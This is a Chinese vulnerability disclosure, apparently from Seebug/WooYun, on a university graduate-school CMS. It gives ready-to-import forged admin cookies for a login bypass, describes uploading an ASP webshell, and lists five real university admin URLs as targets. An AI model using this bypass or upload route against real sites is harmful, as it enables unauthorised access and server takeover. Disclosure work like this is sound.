某高校通用内容管理系统后台任意用户登录+getshell

2014-11-24T00:00:00
ID SSV:95792
Type seebug
Reporter Root
Modified 2014-11-24T00:00:00

Description

简要描述:

本来我是发现了该系统后台注入和万能密码登录的问题的,搜索了下没找到相关内容,以为没人提交过。等我整理好了,又发现了 http://www.wooyun.org/bugs/wooyun-2010-055845。 挺郁闷的啊....既然这样,那咱就换种方法吧。条条大路通后台啊~

详细说明:

南京南软科技为研究生院开发的管理系统 http://www.southsoft.com.cn/Case.asp?id=941 该系统登陆后每次cookie都是一样的,通过简单的伪造cookie就可以绕过后台登陆。 以http://gsnfu.njfu.edu.cn/web_admin/main.aspx为例 直接访问提示 “登录超时或非法登录”

<img src="https://images.seebug.org/upload/201411/231202047797efe30f3c13b50178c094940a490f.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">

添加下列cookei:

admin_classids: admin_id: 1 admin_level:1 admin_name:admin Adminlogin:logined

或者直接导入下列cookie:

[ { "domain": ".yjs.cdutcm.edu.cn", "expirationDate": 1448202000, "hostOnly": false, "httpOnly": false, "name": "admin_level", "path": "/", "secure": false, "session": false, "storeId": "0", "value": "1", "id": 1 }, { "domain": "yjs.cdutcm.edu.cn", "hostOnly": true, "httpOnly": false, "name": "admin_classids", "path": "/", "secure": false, "session": true, "storeId": "0", "value": "", "id": 2 }, { "domain": "yjs.cdutcm.edu.cn", "hostOnly": true, "httpOnly": false, "name": "admin_id", "path": "/", "secure": false, "session": true, "storeId": "0", "value": "1", "id": 3 }, { "domain": "yjs.cdutcm.edu.cn", "hostOnly": true, "httpOnly": false, "name": "admin_name", "path": "/", "secure": false, "session": true, "storeId": "0", "value": "admin", "id": 4 }, { "domain": "yjs.cdutcm.edu.cn", "hostOnly": true, "httpOnly": false, "name": "adminlogin", "path": "/", "secure": false, "session": true, "storeId": "0", "value": "logined", "id": 5 } ]

把域名修改为相应的域名域名就行了。其实系统只判断了adminlogin的值是否为logined,修改admin_id,和admin_name就可以以相应的用户身份登陆了。 添加相应的cookie后,刷新页面。

<img src="https://images.seebug.org/upload/201411/2312031874337ca80da0e0be51fae2f2edfaa5fe.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">

成功以admin的身份登陆了。 可以重置任意用户密码

<img src="https://images.seebug.org/upload/201411/23120339f706f7dd45738f4e98d3ff6b47b535e2.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">

在上传图片的地方研究了半天怎么突破上传,后来发现在编辑器里有个上传可下载文件的地方,可以上传除aspx外任意类型的文件。

<img src="https://images.seebug.org/upload/201411/2312035993f96b0a05c4d62572b6c9558a2472df.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">

上传个asp一句话

<img src="https://images.seebug.org/upload/201411/23120420af5aaa24fde050bd88c05893ad13c384.png" alt="图片5.png" width="600" onerror="javascript:errimg(this);">

成功getshell

<img src="https://images.seebug.org/upload/201411/2312043947c65e10afbde5b69a5fd4543af9455d.png" alt="图片6.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

提供几个测试案例:

http://gsnfu.njfu.edu.cn/web_admin/main.aspx http://gschool.hebmu.edu.cn/web_admin/main.aspx http://yjs.cdutcm.edu.cn/web_admin/main.aspx http://graduate.ynnu.edu.cn/web_admin/main.aspx http://gra.njutcm.edu.cn/web_admin/main.aspx

伪造cookie后访问以上页面即可。